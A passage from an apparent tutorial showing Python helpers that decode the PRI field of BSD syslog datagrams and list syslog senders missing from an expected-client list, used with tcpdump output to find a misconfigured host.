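    """Split a BSD syslog datagram into (facility, severity, message).
    PRI = facility * 8 + severity, so <14> is facility 1 (user), severity 6 (info)."""
    m = PRI_RE.match(payload)
    if not m:
        raise ValueError("datagram has no PRI field")
    pri = int(m.group(1))
    return pri // 8, pri % 8, m.group(2).decode("ascii", "replace")


def unexpected_senders(lines, allowed):
    """Hosts sending us syslog that are not on the expected-client list."""
    return sorted(host for host in syslog_senders(lines) if host not in allowed)
```

Feeding real tcpdump output through `syslog_senders` gives you the misconfigured sender even when syslogd's secure-mode discard messages themselves carry no source address.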